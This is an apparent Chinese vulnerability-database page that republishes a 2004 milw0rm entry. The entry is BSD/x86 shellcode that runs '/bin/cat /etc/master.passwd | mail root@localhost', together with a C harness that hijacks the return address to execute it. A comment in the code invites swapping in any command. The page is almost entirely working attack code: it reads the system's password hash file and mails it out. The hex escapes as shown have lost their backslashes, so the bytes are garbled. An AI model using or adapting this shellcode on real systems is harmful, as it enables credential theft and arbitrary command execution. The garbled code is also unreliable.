BSD/x86 – execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)

BSD/x86 – execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)

漏洞ID 1054683 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-BSD/x86 – execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)-安全小百科CVE编号 N/A
图片[2]-BSD/x86 – execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13255
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
   *BSD version
   FreeBSD, OpenBSD, NetBSD.

   [email protected]

   92 bytes.

   _execve(/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost");
   pueden reemplzar el comando por lo que se les ocurra.
*/

char shellcode[]=

    "xebx25"             /* jmp     <shellcode+39>         */
    "x59"                 /* popl    %ecx                   */
    "x31xc0"             /* xorl    %eax,%eax              */
    "x50"                 /* pushl   %eax                   */
    "x68x6ex2fx73x68" /* push    $0x68732f6e            */
    "x68x2fx2fx62x69" /* push    $0x69622f2f            */
    "x89xe3"             /* movl    %esp,%ebx              */
    "x50"                 /* pushl   %eax                   */
    "x66x68x2dx63"     /* pushw   $0x632d                */
    "x89xe7"             /* movl    %esp,%edi              */
    "x50"                 /* pushl   %eax                   */
    "x51"                 /* pushl   %ecx                   */
    "x57"                 /* pushl   %edi                   */
    "x53"                 /* pushl   %ebx                   */
    "x89xe7"             /* movl    %esp,%edi              */
    "x50"                 /* pushl   %eax                   */
    "x57"                 /* pushl   %edi                   */
    "x53"                 /* pushl   %ebx                   */
    "x50"                 /* pushl   %eax                   */
    "xb0x3b"             /* movb    $0x0b,%al              */
    "xcdx80"             /* int     $0x80                  */
    "xe8xd6xffxffxff" /* call    <shellcode+2>          */
    "/bin/cat /etc/master.passwd|mail root@localhost";

main()
{
   int *ret;
   printf("Shellcode lenght=%dn",sizeof(shellcode));
   ret=(int*)&ret+2;
   (*ret)=(int)shellcode;
}

// milw0rm.com [2004-09-26]

相关推荐: Microsoft Network Monitor (Netmon) HTTP协议分析器缓冲区溢出漏洞

Microsoft Network Monitor (Netmon) HTTP协议分析器缓冲区溢出漏洞 漏洞ID 1206142 漏洞类型 缓冲区溢出 发布时间 2000-12-19 更新时间 2000-12-19 CVE编号 CVE-2000-0817 CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享